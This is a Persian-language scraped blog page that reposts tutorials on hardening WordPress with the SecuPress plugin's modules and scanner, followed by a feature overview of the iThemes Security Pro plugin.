Login Control: در این بخش می‌توانید با تیک زدن گزینه اول تعیین کنید یک کاربر چند بار می‌تواند ورود ناموفق داشته باشد تا مسدود شود. این عدد به صورت پیش فرض روی ۱۰ بار تنظیم شده است. همچنین می‌توانید مدت زمانی که کاربر باید مسدود بماند نیز تغییر دهید که پیشنهاد می‌شود بین ۵ تا ۱۵ دقیقه را برای محافظت از وردپرس انتخاب کنید. در صورتی که گزینه دوم را هم تیک بزنید، افزونه کاربرانی را که قصد دارند با یوزنیم‌هایی که اصلا وجود ندارند به سایتتان وارد شوند، مسدود می‌کند.

 

Login Errors: با تیک زدن گزینه مربوطه، در صورتی که کاربر ورود ناموفق داشته باشد، جزئیات دلیل ناموفق بودن ورودش را دریافت نخواهد کرد. به عنوان مثال کاربری یوزنیم را درست وارد کرده و رمز عبورش را اشتباه وارد می‌کند؛ در صورتی که این گزینه غیر فعال باشد، پیام “رمز عبور برای این یوزنیم اشتباه است” نمایش داده خواهد شد؛ که در این حالت کاربر مطمئن است یوزرنیم درست وارد شده و فقط رمز عبور اشتباه است. اما در صورت فعال بودن گزینه مذکور، پیام “عملیات ورود با شکست مواجه شد” را نمایش می‌دهد. این گزینه زمانی کاربرد دارد که افرادی قصد حدس زدن یوزرنیم و پسورد کاربری خاص در سایت شما را دارند.

 

Use a Captcha for everyone: با تیک زدن گزینه مربوطه، در فرم‌های ورود، گزینه‌ای فعال می‌شود که کاربر باید علاوه بر وارد کردن یوزنیم و پسورد خود، گزینه امنیتی را نیز باید تیک بزند تا ثابت کند ربات نیست. این امر می‌تواند در افزایش امنیت ورود به سایت و محافظت از وردپرس تاثیر چشم گیری داشته باشد؛ اما ممکن است برای برخی کاربران خسته کننده باشد.

Password changement:  می‌توانید با تیک زدن این گزینه، کاربران را هنگام تعویض رمز عبور خود، محبور به وارد کردن رمز عبور قبلی‌شان کنید.

Usernames: با تیک زدن گزینه اول، هنگام ثبت نام کاربران، آن‌ها را محبور می‌کنید تا از یوزرنیم‌های معمول و کم ارزش مانند admin یا www و … استفاده نکنند و یوزرنیم یونیک خود را داشته باشند. گزینه دوم برای محدود کردن اسکریپت‌های مخرب برای پیدا کردن یوزنیم کاربران خاص است که به صورت author=1 یوزنیم‌های کاربران را اسکن می‌کنند.

Login Page: می‌توانید آدرس ورود ادمین سایت یا ورود کاربران را که به صورت پیشفرض wp-admin و wp-login است، تغییر دهید. این مورد می تواند در امنیت سایتتان کارآمد باشد.

سربرگ Plugins & Themes

در وردپرس می‌توان به صورت پیشفرض، قالب‌ها و افزونه‌های مختلف را از طریق منوی افزودن روی هاست آپلود کرد. با فعال کردن گزینه Disallow .zip Uploads، این قابلیت وردپرس غیر فعال خواهد شد. چرا که ممکن است قالب‌ها و افزونه‌های آپلود شده از این طریق دارای کدهای مخرب باشند. زمانی که این گزینه فعال باشد، فقط از طریق مخزن وردپرس و یا FTP می‌توانید قالب‌ها و افزونه‌های جدید را به سایت خود اضافه کنید. در نظر داشته باشید در صورتی که از قالب‌ها و افزونه‌های ایرانی استفاده می‌کنید، این ویژگی، کار را برای شما سخت‌تر خواهد کرد و مجبورید قالب‌ها و افزونه‌ها را از طریق هاست خود آپلود کنید. در کل این ویژگی برای محافظت از وردپرس خیلی پیشنهاد نمی‌شود.

 

دو گزینه Plugin installation و Theme installation مربوط به عدم فعال‌سازی هر قالب یا افزونه جدید است. به اینصورت که به شما (یا مدیران دیگر سایتتان) اجازه فعال سازی یا به طور کلی آپلود قالب یا افزونه جدید را نمی‌دهد. فرق این گزینه با بخش قبلی این است که می‌توان اجازه آپلود فایل‌های zip را محدود به نوع آن (قالب یا افزونه) کرد.

سربرگ WordPress Core

بخش‌های مختلف این سربرگ تنظیماتی را اعمال می‌کنند که از آن‌ها به عنوان “ترفندهای وردپرس” یاد می‌شود.

 

بخش Minor Updates: وردپرس به صورت خودکار، هنگامی که آپدیت‌های جزئی ارائه می‌شوند، خودش را آپدیت می‌کند. اما ممکن است یکی از افزونه‌های سایت شما اجازه این کار را ندهد. اما معمولا آپدیت‌های جزئی وردپرس مربوط به مسائل امنیتی هستند و به طور معمول اختلالی در افزونه‌های شما ایجاد نمی‌کنند. با فعال کردن این گزینه به وردپرس اجازه می‌دهید بدون در نظر گرفتن افزونه‌ها، آپدیت‌های جزئی مثل ۴٫۳٫۹ را به طور خودکار انجام دهد و گامی در محافظت از وردپرس بردارد.

 

بخش Major Updates: با فعال کردن این گزینه، وردپرس را مجبور می‌کنید آپدیت‌های کلی را مثل ۴٫۴ به صورت خودکار انجام دهد. توجه داشته باشید که فعال کردن این گزینه اجباری نیست اما از طرف سازنده برای محافظت از وردپرس پیشنهاد شده است.

 

بخش File edition: به صورت پیشفرض، مدیران سایت می‌توانند کدهای قالب و افزونه‌ها را از طریق ویرایشگر وردپرس و در فضای پیشخوان، تغییر دهند. از نظر افزونه امنیتی Secupress این قابلیت مطلوب نیست و باید غیر فعال شود. با تیک زدن این گزینه می‌توانید این قابلیت را غیر فعال کنید تا تغییر در کدها فقط از طریق هاست امکان‌پذیر باشد.

بخش Unfiltered Uploads: مدیران و نویسندگان سایت می‌توانند فایل‌های مختلفی را از طریق پرونده چند رسانه‌ای وردپرس روی سایتتان آپلود کنند. فعال کردن این گزینه فقط به فایل‌هایی با پسوند مجاز مثل pdf ، mp3 ، و… اجازه آپلود می‌دهد.

 

سربرگ Sensitive Data

در این سربرگ تنظیمات مختلفی وجود دارد که با استفاده از آن‌ها می‌توانید با محدود کردن برخی از داده‌های حساس، امنیت سایت وردپرسی‌تان را افزایش دهید.

بخش XML-RPC: فایل xml-rpc.php در وردپرس برای ایجاد ارتباط بین وردپرس و نرم افزارهای دیگر استفاده می‌شود. مانند اپلیکیشن‌های مدیریت سایت وردپرسی روی تلفن‌های همراه که اطلاعات را از طریق این فایل منتقل می‌کنند. این فایل راه نفوذی به سایت شما ایجاد می‌کند. در صورتی که از اپلیکیشن‌های مدیریت وردپرس روی گوشی خود استفاده نمی‌کنید یا اپلیکیشن خبری یا فروشگاهی به سایتتان متصل نیست، بهتر است با فعال کردن این گزینه، فایل مذکور را از دسترس خارج کنید و محافظت از وردپرس را امکان‌پذیر سازید.

 

بخش Blackhole: فعال کردن این گزینه، اطلاعاتی را در فایل robots.txt اضافه می‌کند که در صورت مشاهده رفتار مخرب ربات‌ها، IP آن‌ها را مسدود می‌کند.

 

بخش Directory Listing: گاهی اوقات با وارد کردن آدرس یک پوشه، محتویات آن به صورت لیست نمایش داده می‌شود. این اتفاق برای پوشه‌هایی می‌افتد که خودمان ایجاد کرده‌ایم. در آن به عنوان مثال آهنگ‌ها را آپلود کرده‌ایم. با وارد کردن آدرس پوشه اصلی، لیست تمام آهنگ‌ها به نمایش در می‌آید که از لحاظ امنیتی مناسب نیست و کاربر باید آدرس دقیق فایل را وارد کند تا به آن دسترسی داشته باشد. بعد از فعال کردن این گزینه، کاربر به جای مشاهده لیست فایل‌ها، با خطای ۴۰۳ مواجه می‌شود.

بخش PHP disclosure: زبان PHP به طور اشتباه اطلاعاتی از ماژول‌های نصب شده را افشا می‌کند که برای امنیت سایت چندان خوشایند نیست و با فعال کردن این گزینه می‌توانید از آن جلوگیری کرده و محافظت از وردپرس را امکان‌پذیر سازید.

 

بخش PHP version disclosure: در برخی از صفحات سایت روی بعضی از سرورها، ورژن PHP را که شما در حال استفاده از آن هستید نمایش می‌دهد که می‌تواند کمکی برای حمله به سایت شما باشد. با فعال کردن این گزینه، اطلاعات ورژن PHP نمایش داده نخواهد شد.

بخش WordPress version disclosure: اگر از صفحه سایت خود Inspect بگیرید، متوجه می‌شوید که شماره نسخه وردپرس شما را در جاهای مختلف نمایش می‌دهد که می‌تواند برای هکرها کمکی جهت حمله بهتر باشد. با فعال کردن این گزینه، تمامی اعداد مربوط به نسخه وردپرس از کدهای سایتتان حذف خواهد شد.

بخش Bad URL Access: دسترسی مستقیم به برخی از فایل‌های حساس وردپرس را محدود می‌کند که برای محافظت از وردپرس می‌توانید آن را فعال کنید.

بخش Protect readme files: فایل‌های readme.txt می‌توانند اطلاعات خوبی را به هکرها برای یک حمله محاسبه شده بدهند. با فعال کردن این گزینه آن‌ها را از دسترس هکرها خارج کنید.

 

سربرگ Firewall

در این سربرگ تنظیمات مختلفی برای بلاک کردن درخواست‌های مخرب و مشکوک وجود دارد.

بخش Bad Headers: در این بخش ۳ گزینه مختلف وجود دارد که به ترتیب برای محافظت از وردپرس از کاربران مخرب همانند ربات‌ها، درخواست‌های غیر مجاز و ربات‌های ناشناخته برای بررسی سئو وردپرس است.

 

بخش Malicious URLs: با تنظیمات این بخش می‌توانید، URL های مخرب را کنترل کنید یا جلوی دستکاری آن‌ها را بگیرید. گزینه اول این بخش برای بلاک کردن URL های مخرب است که ممکن است توسط افزونه‌ها یا کاربران سایتتان ایجاد شده باشد. گزینه دوم اسکنرهای SQLi را بلاک می‌کند و گزینه سوم هم افرادی را که دنبال فایل PHP خاص یا مخربی هستند، با صفحه ۴۰۴ رو به رو می‌کند و سپس آن‌ها را بلاک می‌کند. این تنظیمات، تخصصی هستند و شاید خیلی کارامد نباشند. اما با گذشت زمان در صورت نیاز می‌توانید آن‌ها را فعال کنید.

 

سربرگ Anti Spam

اسپم‌ها همیشه آزاردهنده هستند. ماژول آنتی اسپم افزونه Secupress امکانات خوبی برای مقابله با اسپم‌ها برای ما فراهم می‌کند. اسپم‌ها معمولا در بخش کامنت‌ها به چشم می‌خورند. مبارزه با آن‌ها از راهکارهای امنیتی مهم برای هر سایتی به شمار می‌آید. با فعال کردن این ماژول، تنظیمات آن نمایش داده خواهد شد.

در بخش Handling Spam تعیین می کنید که اسپم‌ها برای همیشه در دیتابیس ذخیره بمانند یا پس از ۳۰ روز حذف شوند. با فعال کردن بخش Shortcode Usage، اگر کاربری در ارسال دیدگاه در متن آن از شورت کدها استفاده کند، به عنوان اسپم شناخته خواهد شد.

 

Improve the WordPress comments blacklist این امکان را برای شما فراهم می کند تا از بیش از ۲۰۰۰۰ کلمه  از قبل آماده شده که به عنوان اسپم شناخته می‌شوند استفاده کنید. این کلمات در زبان‌های مختلف آماده شده‌اند که می‌تواند کار شما را راحت‌تر کند.

 

بخش آخر Pingbacks & Trackbacks است که در صورتی که از آن‌ها استفاده‌ای ندارید، برای امنیت بیشتر می‌توانید آن‌ها را با تیک زدن گزینه مربوطه غیرفعال کنید.

 

سربرگ Logs

در این سربرگ ۲ بخش مهم وجود دارد که به شرح آن‌ها می‌پردازیم:

بخش Actually Banned IPs: لیستی از IP های بلاک شده را نشان می‌دهد که در صورت تمایل می‌توانید آن‌ها را در صورت نیاز از این حالت خارج کنید. همچنین می‌توانید IP جدیدی را برای مسدود شدن به لیست اضافه کنید.

بخش IPs :Whitelist IP هایی که هرگز نباید مسدود شوند در این لیست قرار می‌گیرند. همانند IP مدیران سایت. این بخش تنها زمانی کاربرد دارد که شما از IP ثابت استفاده کنید.

با فعال کردن گزینه WordPress action logs، لیستی از فعالیت های روزمره وردپرس، همانند تغییرات پسورد و پروفایل کاربران، تغییرات ایمیل و … نمایش داده می‌شود. گزینه Error Pages Log 404 لیستی از صفحه‌های ۴۰۴ که برخی افراد مکرر با آن مواجه شده‌اند را به شما نمایش می‌دهد که ممکن است برخی ربات‌های مخرب برای پیدا کردن صفحاتی خاص در سایت شما با این صفحات رو به رو شده باشند.

 

سربرگ Alerts

در این ماژول فقط یکی از ویژگی‌ها در نسخه رایگان فعال است. در بخش Email Notifications، ایمیل خود را وارد کنید تا خلاصه رویدادهای امنیتی سایتتان برای شما ایمیل شود. اگر می‌خواهید گزارش‌ها به چند ایمیل مختلف ارسال شود، در هر خط یکی از ایمیل‌ها را وارد کنید.

 

سایر ماژول‌های این افزونه در نسخه پولی و حرفه‌ای آن در دسترس است.

 

اسکن امنیت وردپرس با Secupress

بسیار خوب! تا اینجا با ماژول های افزونه امنیت وردپرس Secupress  آشنا شدیم. حالا می‌خواهیم از اسکنر این افزونه برای اسکن امنیت وردپرس و محافظت از وردپرس استفاده کنیم. در منوی سمت راست وردپرس، در منوی افزونه Secupress، روی گزینه Scanners کلیک کنید.

 

در صفحه باز شده، ۴ مرحله اسکن امنیت را مشاهده می‌کنید. روی دکمه Scan My Website کلیک کنید تا فرایند اسکن شروع شود.

همانطور که مشاهده می کنید، اسکنر این افزونه تمامی موارد امنیتی را که قبلا معرفی کردیم، بررسی می‌کند. اگر پیغام BAD یا WARNING را کنار هر مورد دریافت کردید، با رفتن به منوی Modules افزونه، مورد را رفع کنید. همچنین افزونه به شما درجه‌ای را نشان می‌دهد که نشان‌دهنده میزان امنیت سایت شماست. وقتی این درجه به A تبدیل شد، یعنی امنیت سایت شما قابل قبول است. دقت کنید بعضی هشدارهای اسکنر با ماژول‌هایی رفع می‌شوند که در نسخه رایگان در دسترس نیستند و برای حل این مشکل باید نسخه حرفه‌ای را خریداری کنید.

 

با کلیک کردن روی گزینه Next Step، به مرحله دوم اسکن که Auto Fix است، می روید. این مرحله در نسخه حرفه‌ای در دسترس است و خطاهای صفحه قبل را به طور خودکار رفع می‌کند. اما در نسخه رایگان شما باید به صورت دستی ماژول‌های لازم را فعال نمایید. در مرحله سوم هم می‌توانید به صورت دستی از صحت فعال بودن ماژول‌ها اطمینان حاصل کنید و در مرحله آخر، نتیجه اسکن و لینک‌های ماژول‌ها و همچنین نتیجه محافظت از وردپرس را در اختیارتان قرار می‌دهد.

 

نتیجه گیری

اگر محافظت از وردپرس برایتان اهمیت دارد و به دنبال یک افزونه کاربردی، با گرافیک خوب و تنظیمات راحت هستید، می توانید از افزونه امنیت وردپرس Secupress استفاده کنید. این افزونه با ماژول‌های متعددی که در اختیار شما می‌گذارد، امنیت سایتتان را به درجه خوبی می‌رساند.

نوشته محافظت از وردپرس با افزونه Secupress اولین بار در بیست اسکریپت. پدیدار شد.

[ad_2]

لینک منبع مطلب

آموزش تغییر پیشوند جداول وردپرس برای امنیت بیشتر
[ad_1]

[ad_2]

لینک منبع مطلب

افزونه فوق امنیتی وردپرس Security Pro نسخه ۵٫۵٫۶
[ad_1]

افزونه iThemes Security Pro جزو افزونه هایی است که جای آن در هیچ سایت قدرت گرفته از وردپرسی نباید خالی باشد. حال اگر میخواهید چند قدم از دیگر جلو تر باشید و امنیت وبسایت خود را به شکل چشمگیری افزایش دهید، بهتر است از نسخه ی حرفه ای این افزونه یعنی iThemes Security Pro استفاده کنید. افزونه iThemes Security Pro علاوه بر دارا بودن امکانات نسخه ی رایگان خود، امکانات جدید و جالبی را به شما ارائه میکند که میتوانند در امن کردن سایت وردپرسی شما به شکل چشمگیری موثر باشند. در ادامه سعی میکنیم به امکانات بخش های مختلف افزونه iThemes Security Pro اشاره کنیم. با ما همراه باشید.

محافظت در برابر حملات Brute Force

با استفاده از تنظیمات مخصوص جلوگیری از حملات بروت فورس در افزونه iThemes Security pro میتوانید حداکثر دفعات تلاش ناموفق برای ورود به وردپرس را تعیین کنید. به این شک اگر کسی بخواهد با حدس زدن رمز به وردپرس لاگین کند، پس از رسیدن به حداکثر مجاز دفعات تلاش برای ورود، به صورت اتوماتیک بن شده و از دسترسی او به سایت جلوگیری خواهد شد.

تشخیص تغییر فایل ها

اگر کسی بتواند به نحوی به سایت شما نفوذ کند، یکی از اولین کارهاش تزریق کد مخرب به فایل های وردپرس شما خواهد بود. با ویژگی File change Detection در افزونه iThemes Security Pro میتوانید از طریق دریافت هشدار های ایمیلی از این مسئله آگاه شوید و در صورتی که وبسایت شما هک شده باشد، به سرعت اقدامات لازم را انجام دهید.

تشخیص خطای ۴۰۴

اگر یک ربات به دنبال تشخیص نقاط آسیب پذیر، وبسایت شما را اسکن کند، بدون شک به تعداد زیادی خطای ۴۰۴ برخورد خواهد کرد. با استفاده از ویژگی ۴۰۴ Detection شما میتوانید کاری کنید که در صورتی که شخصی در بازه ی زمانی مشخص، تعداد زیادی خطای ۴۰۴ دریافت کند، آدرس IP او به صورت اتوماتیک بن شده و از دسترسی او به سیستم جلوگیری شود.

اجبار استفاده از رمز قوی

یکی از موارد پایه ای که میتواند منجر به امن تر شدن سایت شما شود، استفاده از رمز های مناسب است. با استفاده از این ویژگی شما میتوانید کاربران سایت خود را مجبور به استفاده از رمز های قوی و مناسب کنید.

جلوگیری از دسترسی کاربران مشکوک

با استفاده از این ویژگی میتوانید با بن کردن آی پی افراد خرابکار، از دسترسی آنها به سیستم جلوگیری کند. افزونه iThemes Security Pro میتواند در صورتی که کاربری سعی در حدس زدن رمز برای ورود به سایت داشته باشد و یا دفعات خاصی با خطای ۴۰۴ مواجه شده باشد، به طور اتوماتیک از دسترسی او به سیستم جلوگیری کند. این افزونه همچنین به blacklist ربات ها نیز مجهز است و از این طریق میتواند جلوی دسترسی بات هایی که از قبل به عنوان خرابکار شناخته شده اند را بگیرد.

امکان قرارگیری در حالت Away Mode

اگر قرار است مدتی به ناحیه مدیریت وردپرس خود سر نزنید، با این ویژگی میتوانید امکان دسترسی به مدیریت وردپرس را برای ساعاتی خاص غیر فعال کنید تا شخص دیگری قادر به ورود به سیستم نباشد. مثلا اگر قصد دارید چند روزی به مسافرت بروید، این امکان میتواند گزینه ی مناسبی برای شما باشد.

تغییر آدرس مدیریت وردپرس

تغییر آدرس ورود به مدیریت وردپرس یکی از موارد امنیتی بسیار مهم است. وقتی آدرس ورود به ادمین وردپرس را تغییر میدهید، حدس زدن آن برای افراد خرابکار دشوار بوده و باعث میشود کسی نتواند با استفاده از اتک بروت فورس، رمز شما را پیدا کرده و وارد ناحیه مدیریت شود. چرا که شخص خرابکار در این حالت نمیداند از چه آدرسی میتواند به ناحیه مدیریت وردپرس دسترسی پیدا کند.

ایجاد بکاپ از دیتابیس

داشتن بکاپ های منظم از دیتابیس، همیشه باعث آسودگی خاطر است. اگر مرتبا از دیتابیس خود نسخه پشتیبان تهیه کنید، میتوانید مطمئن باشید که در صورت بروز مشکل، اطلاعات شما امن و قابل بازگردانی هستند. با استفاده از این امکان شما میتوانید بکاپ های دلخواه خود را تنظیم کرده و علاوه بر ذخیره ی آنها بر روی هاست، آنها را به صورت پیوست شده به ایمیل نیز دریافت کنید. برای ایجاد بکاپ های منظم، استفاده از افزونه BackupBuddy هم انتخاب بسیار مناسبی به شمار میرود.

ارسال هشدار های ایمیلی

هرگاه کسی بخاطر داشتن تعداد خاصی لاگین ناموفق به سیستم، بن شود و یا هرگاه فایلی در سایت شما تغییر کند، افزونه iThemes Security شما را از طریق ایمیل از این مسئله آگاه خواهد کرد.

تغییر کلید های امنیتی وردپرس

با استفاده از افزونه iThemes Security Pro میتوانید به سادگی کلید های امنیتی (salt) وردپرس را آپدیت کرده و از این طریق رده ی امنیت سایت خود را بالاتر ببرید.

مقایسه ی فایل ها به صورت آنلاین

قبلا هم اشاره کردیم که این افزونه به قابلیت تشخیص تغییر فایل ها مجهز است. اما امکانی که جدیدا به افزونه اضافه شده به iThemes Security Pro اجازه میدهد که فایل های هسته ی وردپرس را با فایل های موجود در wordpress.org مقایسه کند تا از این طریق مطمئن شود که تغییرات صورت گرفته در این فایلها مخرب نبوده و فایلهای هسته ی سایت شما با فایل های هسته ی رسمی وردپرس منطبق هستند.

بهره گیری از سرویس reCAPTCHA گوگل

با بهره گیری از این امکان میتوانید به بخش های مثل صفحه ورود وردپرس، ثبت نام کاربران و درج دیدگاه ها در وردپرس، امکان استفاهد از سرویس ریکپچای گوگل را اضافه نمایید. به این ترتیب از سوء استفاده ربات ها از این بخش ها جلوگیری به عمل خواهید آورد.

استفاده از لاگین دو مرحله ای Two Factor Authentication

لاگین دو مرحله ای یا Two Factor Authentication امکان بسیار مهم و جالبی است. با استفاده از این امکان لایه ی امنیتی جدیدی به سایت شما افزوده میشود. در صورت استفاده از Two Factor Authentication در زمان ورود به وردپرس لازم است که علاوه بر رمز عبور خود، کدی که بر روی موبایل خود دریافت میکنید را نیز به سیستم ارائه کنید. در این حالت حتی اگر کسی رمز شما را حدس هم بزند، به این جهت که نمیتواند کد امنیتی دوم را وارد سیستم کند، از ورود وی به وردپرس جلوگیری به عمل خواهد آمد.

بررسی امنیت کاربران در وردپرس

افراد سودجو و خرابکار، همیشه از طریق اکانت مدیر اصلی وارد وردپرس نمیشوند. داشتن یک حساب کاربری ناامن در وردپرس میتواند درهای وبسایت شما را به روی انواع خطرهای امنیتی باز کند. با استفاده از امکان بررسی امنیت کاربران در افزونه iThemes security pro شما میتوانید اکانت های کاربران را به دنبال نقاط نا امن بررسی کرده و از امنیت آنها اطمینان حاصل کنید.

این امکان میتواند به شما اعلام کند که کدام کاربران ورود دو مرحله ای را بر روی اکانت خود فعال نکرده اند و هر کاربر آخرین بار چه زمانی فعال بوده است. شما میتوانید به صورت آنی افرادی که وارد سیستم شده اند را مشاهده کرده و در صورت نیاز آنها را بلافاصله از سیستم بیرون بیاندازید تا مجبور شوند دوباره وارد سیستم شوند. شما میتوانید نقش کاربران را به صورت آنی تغییر دهید و اکانت هایی که بی کاربرد هستند یا در مدتی طولانی مورد استفاده قرار نگرفته اند را از سیستم حذف کنید.

اسکن سایت به دنبال بدافزار ها – Malware Scanning

افزونه iThemes Security Pro برای اسکن سایت از Sucuri SiteCheck استفاده میکند. شما میتوانید با این ابزار سایت خود را اسکن کنید و در صورتی که سایت شما به علت وجود Malware در بلک لیست قرار گرفته باشد، بلافاصله از این مسئله اطلاع پیدا کنید. این ابزار همچنین میتواند خطاهای احتمالی و آپدیت نبودن نرم افزار سایت را نیز به شما اعلام کند. همچنین در صورت نیاز امکان زمانبندی اسکن های روزانه نیز برای شما فراهم شده. در این حالت در صورت مشاهده مشکل، iThemes Security Pro میتواند شما را از طریق ارسال ایمیل از این امر باخبر کند.

در بالا به توضیح برخی امکانات اصلی افزونه iThemes Security Pro پرداختیم. اما امکانات این افزونه به همینجا ختم نمیشود. لیستی از امکانات کلی این افزونه به همراه امکانات اضافی آن نسبت به نسخه رایگان، برای شما درج شده.

امکانات افزونه امنیتی iThemes Security Pro :

ویژگی هایی که در زیر درج شده هم در نسخه ی رایگان و هم در نسخه ی حرفه ای افزونه موجودند.

• بررسی امنیت سایت تنها با یک کلیک
• بن کردن کاربران مخرب
• بن کردن IP ها یا agent های خاص و جلوگیری از دسترسی آنها به سایت
• تشخیص خطای ۴۰۴
• مخفی کردن آدرس ورود به ناحیه مدیریت وردپرس
• تغییر کلید های امنیتی وردپرس
• حالت Away
• ایجاد بکاپ از دیتابیس
• تشخیص تغییر فایل ها
• حذف اطلاعات سربرگ Windows Live Writer
• حذف اطلاعات سربرگ RSD
• حذف هشدار آپدیت از نقش های کاربری خاص در وردپرس
• غیر فعال کردن خطاهای ورود
• تغییر نام کاربری admin
• تغییر ID کاربری که دارای شناسه ۱ باشد
• تغییر پیشوند جداول وردپرس
• تغییر مسیر wp-content
• الزام استفاده از SSL برای نوشته ها، برگه ها و ناحیه مدیریت وردپرس
• غیر فعال کردن امکان ویرایش فایل در ناحیه مدیریت وردپرس
• کاهش کامنت های اسپم
• جلوگیری از حملات بروت فورس
• جلوگیری از حمله بروت فروس بر روی فایل XML-RPC
• لاگ های امنیتی
• ارسال ایمیل های نوتفیکیشن
• پیام قفل شدن دسترسی قابل سفارشی سازی
• الزام استفاده از رمز های دشوار
• بررسی سطح دسترسی فایل ها
• اسکن بدافزار

امکانات انحصاری افزونه iThemes Security Pro

امکاناتی که در زیر درج شده تنها در این نسخه یعنی نسخه ی حرفه ای افزونه (iThemes Security Pro) موجود هستند.

• ابزارک داشبورد وردپرس
• یکپارچه سازی با گوگل ریکپچا
• سیستم لاگین دو مرحله ای یا Two Factor Authentication
• امکان برون ریزی و درون ریزی تنظمیات
• امکان بررسی صحت فایل های هسته ی وردپرس به صورت آنلاین
• امکان زمانبندی اسکن Malware
• ثبت لاگ عملیات کاربران
• تغییر موقت نقش کاربر در بازه زمانی خاص
• یکپارچه سازی با WP-CLI
• پسورد های دارای تاریخ انقضا
• بررسی امنیت کاربران
• و..

نوشته افزونه فوق امنیتی وردپرس Security Pro نسخه ۵٫۵٫۶ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.

[ad_2]

لینک منبع مطلب